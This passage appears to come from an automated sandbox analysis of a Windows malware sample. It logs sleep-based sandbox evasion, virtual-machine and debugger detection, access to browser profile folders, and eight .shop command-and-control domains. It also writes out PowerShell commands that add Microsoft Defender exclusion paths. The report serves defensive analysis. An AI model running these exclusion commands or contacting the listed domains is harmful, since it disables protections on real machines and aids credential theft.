                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99888s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99554s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -99016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98351s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -98031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -97047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -96938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -96811s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7896Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep count: 6083 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep count: 3652 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 7901 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 1783 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe TID: 7944Thread sleep count: 596 > 30Jump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe TID: 7964Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe TID: 7968Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99888Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99672Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99554Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99453Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99344Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99234Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99125Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99016Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98906Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98797Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98687Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98578Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98469Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98351Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98250Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98141Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97922Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97812Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97703Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97594Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97484Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97375Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97266Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97156Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97047Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 96938Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 96811Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: VBoxService.exe
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: ~VirtualMachineTypes
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035181529.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034658260.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: VMWare
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: &VBoxService.exe
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000AB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AED910 LdrInitializeThunk,7_2_00AED910
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_03227E99 mov eax, dword ptr fs:[00000030h]7_2_03227E99
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_0322803D mov eax, dword ptr fs:[00000030h]7_2_0322803D
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: jyidkjkfhjawd.exeString found in binary or memory: cloudewahsj.shop
                Source: jyidkjkfhjawd.exeString found in binary or memory: noisycuttej.shop
                Source: jyidkjkfhjawd.exeString found in binary or memory: rabidcowse.shop
                Source: jyidkjkfhjawd.exeString found in binary or memory: framekgirus.shop
                Source: jyidkjkfhjawd.exeString found in binary or memory: tirepublicerj.shop
                Source: jyidkjkfhjawd.exeString found in binary or memory: abruptyopsn.shop
                Source: jyidkjkfhjawd.exeString found in binary or memory: wholersorie.shop
                Source: jyidkjkfhjawd.exeString found in binary or memory: nearycrepso.shop
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: abruptyopsn.shoph
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\FkSpRTrp\jyidkjkfhjawd.exe "C:\FkSpRTrp\jyidkjkfhjawd.exe" Jump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AE8040 cpuid 7_2_00AE8040
                Source: C:\Users\user\Desktop\eXbhgU9.exeQueries volume information: C:\Users\user\Desktop\eXbhgU9.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
